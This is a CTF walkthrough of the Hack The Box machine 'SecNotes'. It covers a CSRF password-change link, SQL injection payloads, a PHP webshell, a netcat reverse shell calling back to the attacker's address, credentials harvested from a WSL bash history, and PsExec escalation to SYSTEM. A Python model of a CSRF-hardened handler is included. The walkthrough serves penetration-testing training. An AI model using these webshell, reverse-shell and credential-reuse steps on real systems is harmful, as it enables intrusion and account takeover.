Today we are going to solve another CTF challenge, “SecNotes”, which is available online for those who want to improve their skills in penetration testing and black-box testing. SecNotes is a retired vulnerable lab presented by Hack The Box for online penetration practice according to your experience level; they have a collection of vulnerable labs as challenges from beginner to expert level.
Level: Medium
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are available online, they have static IPs; the IP of SecNotes is 10.10.10.97, so let’s begin with nmap port enumeration.
c:\PENTEST>nmap -sC -sV 10.10.10.97
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-21 18:18 W. Europe Standard Time
Nmap scan report for 10.10.10.97
Host is up (0.022s latency).
Not shown: 998 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
445/tcp open  microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h36m34s, deviation: 4h37m08s, median: -3m26s
| smb-os-discovery:
|   OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: SECNOTES
|   NetBIOS computer name: SECNOTES\x00
|   Workgroup: HTB\x00
|_  System time: 2019-01-21T09:15:49-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-01-21 18:15:51
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 65.69 seconds

c:\PENTEST>
Visual inspection of the two IIS instances reveals a custom PHP web application on port 80 and the default IIS welcome page on port 8808.
Weak Password Change Mechanism
A common issue with password change mechanisms is a failure to validate that the user knows the existing password. Password recovery mechanisms also allow users to change their password without knowing the existing password, but they may require an additional verification step, such as sending the reset request to the email address associated with the username. If a malicious user gets a victim to click on a malicious password change request, and validation of the existing password is not required, then they may be able to take control of the account.
Cross-Site Request Forgery (CSRF)
The "Contact Us" form is directed to tyler, and if a malicious password reset request is sent to this user, they might click the link. CSRF tokens would defend against this attack, but they haven’t been implemented in the web application. In Burp, the "Change Password" request type is changed from POST to GET, and the malicious URL is constructed.
http://10.10.10.97/change_pass.php?password=123456&confirm_password=123456&submit=submit
The URL is pasted into the message body of the Contact request, and after a short while the credentials tyler:123456 can be used to log into the website. Once logged in, credentials to access an SMB share are found.
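To show why that single link works, and what a fixed handler looks like, here is an added Python model of the change-password endpoint (it is not the SecNotes application’s own code, which the page does not show). The USERS and SESSIONS stores, the function names and the PBKDF2 hashing are assumptions; the hardened version adds the three checks the text calls for: POST only, a CSRF token, and proof of the current password.

```python
import hashlib
import hmac
import secrets

# Constructed demo state, not the SecNotes application's own: one user and one session.
def hash_password(password, salt=None):
    salt = salt if salt is not None else secrets.token_bytes(16)
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

USERS = {"tyler": hash_password("old-password")}
SESSIONS = {"tyler": {"csrf_token": secrets.token_hex(16)}}

def password_ok(user, password):
    salt, digest = USERS[user]
    return hmac.compare_digest(hash_password(password, salt)[1], digest)

def change_pass_weak(session_user, method, params):
    # Models the behaviour described above: a logged-in session plus two matching
    # fields is enough, the request may be GET or POST, there is no CSRF token and
    # the existing password is never asked for.
    if params.get("password") != params.get("confirm_password"):
        return "mismatch"
    USERS[session_user] = hash_password(params["password"])
    return "changed"

def change_pass_hardened(session_user, method, params):
    if method != "POST":
        return "method-not-allowed"   # a state change never rides on a clickable GET link
    expected = SESSIONS[session_user]["csrf_token"]
    if not hmac.compare_digest(params.get("csrf_token", ""), expected):
        return "bad-csrf"             # request did not originate from our own form
    if not password_ok(session_user, params.get("current_password", "")):
        return "wrong-current-password"  # prove knowledge of the existing password
    if params.get("password") != params.get("confirm_password"):
        return "mismatch"
    USERS[session_user] = hash_password(params["password"])
    return "changed"

def demo():
    """Replays the forged request from the walkthrough against both handlers."""
    forged = {"password": "123456", "confirm_password": "123456", "submit": "submit"}
    results = []
    results.append(change_pass_weak("tyler", "GET", forged))       # "changed"
    results.append(password_ok("tyler", "123456"))                  # True: account taken over
    USERS["tyler"] = hash_password("old-password")                  # reset for the second run
    results.append(change_pass_hardened("tyler", "GET", forged))   # "method-not-allowed"
    results.append(change_pass_hardened("tyler", "POST", forged))  # "bad-csrf"
    legit = dict(forged, csrf_token=SESSIONS["tyler"]["csrf_token"], current_password="old-password")
    results.append(change_pass_hardened("tyler", "POST", legit))   # "changed"
    return results
```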
Second-Order SQL Injection
Access to the SMB credentials can also be gained by bypassing the authentication mechanism.
The website is tested for SQL injection vulnerabilities. A number of authentication bypass payloads are selected from the SecLists Generic-SQLi list.
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/Generic-SQLi.txt
' or 0=0 --
' or 0=0 #
' or 0=0 #"
' or '1'='1' --
' or 1 --'
' or 1=1 --
' or 1=1 or ''='
' or 1=1 or ""=
' or a=a --
' or a=a
') or ('a'='a
'hi' or 'x'='x';
The login request is sent to the Burp Intruder module (CTRL + I), but this test is not successful.
The register page is tested next, and a payload of ' or 1=1-- returns the result “This username is already taken”. Other payloads seem to have been accepted and registered as valid user accounts.
We tried inserting SQL injection queries in the login form and nothing showed up. Then we tried second-order SQL injection, which is nothing more than inserting SQL injection payloads on the sign-up form itself, hoping that the server-side script would show unusual behaviour and reveal some database information.
According to PortSwigger: “Second-order SQL injection arises when user-supplied data is stored by the application and later incorporated into SQL queries in an unsafe way. To detect the vulnerability, it is normally necessary to submit suitable data in one location, and then use some other application function that processes the data in an unsafe way.”
The query that we used was:
Username: ' or 1='1
Password: ' or 1='1
Confirm password: ' or 1='1
It hit successfully and opened up a user account. It seemed the page heading was what triggered this second-order SQLi vulnerability, but it served our purpose and gave us three notes from the database. The third one contained what looked like the username and password of a service.
Tyler seems to be a person responsible for people’s queries. After obtaining Tyler’s password the first guess was logging into SMB server running on port 445.
Foothold: SMB Share Access
The credentials are used to access the “new-site” share, which appears to be the IIS webroot.
root@kali:~/htb# smbclient //secnotes.htb/new-site -U "tyler"
Enter WORKGROUP\tyler's password: 92g!mA8BGjOirkL%OG*&
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sun Aug 19 14:06:14 2018
  ..                                  D        0  Sun Aug 19 14:06:14 2018
  iisstart.htm                        A      696  Thu Jun 21 11:26:03 2018
  iisstart.png                        A    98757  Thu Jun 21 11:26:03 2018

                12978687 blocks of size 4096. 8118293 blocks available
Write access is possible, and a minimal PHP webshell, puckie.php, with the contents below is uploaded.
<?php echo shell_exec($_GET["cmd"]); ?>
Viewing user.txt:
http://10.10.10.97:8808/puckie.php?cmd=type%20c:\users\tyler\desktop\user.txt 6fa*****4f3
Upgrade Webshell to Reverse Shell
In order to get a proper shell, the “Invoke-PowerShellTcp.ps1” PowerShell script from Nishang can be used.
https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
The following command is used to execute the reverse shell payload.
http://10.10.10.97:8808/puckiestyle.php?cmd=powershell%20-ep%20bypass%20.\puckieshell443.ps1
Or with netcat (instead of Nishang):
root@kali:~/htb# curl 10.10.10.97:8808/puckiestyle.php?cmd=nc+-e+cmd.exe+10.10.14.5+9001
root@kali:~/htb# rlwrap nc -lvp 9001
listening on [any] 9001 ...
connect to [10.10.14.5] from secnotes.htb [10.10.10.97] 49722
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\new-site>whoami
whoami
secnotes\tyler
The command is URL-encoded in Burp (CTRL+U), the request is sent, and a shell as SECNOTES\tyler is received.
C:\pentest>runas /netonly /user:secnotes.htb\tyler cmd
Enter the password for secnotes.htb\tyler: 92g!mA8BGjOirkL%OG*&
Attempting to start cmd as user "secnotes.htb\tyler" ...

C:\pentest>

cmd (running as secnotes.htb\tyler)
C:\Windows\system32>dir \\10.10.10.97\new-site
 Volume in drive \\10.10.10.97\new-site has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of \\10.10.10.97\new-site

21/01/2019  10:22    <DIR>          .
21/01/2019  10:22    <DIR>          ..
21/06/2018  16:26               696 iisstart.htm
21/06/2018  16:26            98.757 iisstart.png
               2 File(s)         99.453 bytes
               2 Dir(s)  33.213.988.864 bytes free

c:\PENTEST>copy puckie.php \\10.10.10.97\new-site
        1 file(s) copied.

c:\PENTEST>copy puckieshell443.ps1 \\10.10.10.97\new-site
        1 file(s) copied.

c:\PENTEST>dir \\10.10.10.97\new-site
 Volume in drive \\10.10.10.97\new-site has no label.
 Volume Serial Number is 9CDD-BADA

 Directory of \\10.10.10.97\new-site

21/01/2019  16:02    <DIR>          .
21/01/2019  16:02    <DIR>          ..
21/06/2018  16:26               696 iisstart.htm
21/06/2018  16:26            98.757 iisstart.png
21/01/2019  10:19                44 puckie.php
21/01/2019  14:05             4.401 puckieshell443.ps1
               4 File(s)         99.497 bytes
               2 Dir(s)  33.213.988.864 bytes free

c:\PENTEST>
Netcat listener:
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.97: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.97] 49791: NO_DATA
Windows PowerShell running as user SECNOTES$ on SECNOTES
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\inetpub\new-site> ls

    Directory: C:\inetpub\new-site

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        6/21/2018   8:26 AM            696 iisstart.htm
-a----        6/21/2018   8:26 AM          98757 iisstart.png
-a----        1/21/2019   1:19 AM             44 puckie.php
-a----        1/21/2019   5:05 AM           4401 puckieshell443.ps1
Privilege Escalation
Discovery of Administrator Password
Enumeration of C:\ reveals the file “Ubuntu.zip” and a “Distros\Ubuntu” folder. Has Windows Subsystem for Linux (WSL) perhaps been installed?
In order to check if WSL has been installed, the following command is issued.
PS C:\> Get-ChildItem HKCU:\Software\Microsoft\Windows\CurrentVersion\Lxss

    Hive: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Lxss

Name                                   Property
----                                   --------
{02893575-609c-4e3b-a426-00f9d9b271da} State             : 1
                                       DistributionName  : Ubuntu-18.04
                                       Version           : 1
                                       BasePath          : C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState
                                       PackageFamilyName : CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc
This confirms that WSL has been installed, and that the Linux filesystem lives under the BasePath shown above.
The Linux filesystem is enumerated. The “.bash_history” file is checked, and administrative credentials are discovered.
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs> cd root
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> ls

    Directory: C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        6/22/2018   2:56 AM                filesystem
-a----        6/22/2018   3:09 AM           3112 .bashrc
-a----        6/22/2018   2:41 PM            398 .bash_history
-a----        6/21/2018   6:00 PM            148 .profile

PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root> cat .bash_history
cd /mnt/c/
ls
cd Users/
cd /
cd ~
ls
pwd
mkdir filesystem
mount //127.0.0.1/c$ filesystem/
sudo apt install cifs-utils
mount //127.0.0.1/c$ filesystem/
mount //127.0.0.1/c$ filesystem/ -o user=administrator
cat /proc/filesystems
sudo modprobe cifs
smbclient
apt install smbclient
smbclient
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
> .bash_history
less .bash_history
exit
PS C:\Users\tyler\AppData\Local\Packages\CanonicalGroupLimited.Ubuntu18.04onWindows_79rhkp1fndgsc\LocalState\rootfs\root>
The same enumeration can also be carried out using bash.
bash -c "whoami;hostname"
bash -c "ls -al /root"
bash -c "cat /root/.bash_history"
With the recovered Administrator password, an administrative shell can be gained using PsExec: Sysinternals psexec.exe gives a shell as secnotes\administrator, and Impacket’s psexec.py gives NT AUTHORITY\SYSTEM.
C:\Users\jacco>psexec.exe \\10.10.10.97 -u SECNOTES\Administrator cmd.exe

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com

Password: u6!4ZwgwOM#^OBf#Nwnh

Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
secnotes\administrator
root@kali:~/htb# psexec.py Administrator@10.10.10.97
Impacket v0.9.20-dev - Copyright 2019 SecureAuth Corporation

Password: u6!4ZwgwOM#^OBf#Nwnh
[*] Requesting shares on 10.10.10.97.....
[*] Found writable share ADMIN$
[*] Uploading file FtHMilUj.exe
[*] Opening SVCManager on 10.10.10.97.....
[*] Creating service gSOW on 10.10.10.97.....
[*] Starting service gSOW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system
Author: Puckiestyle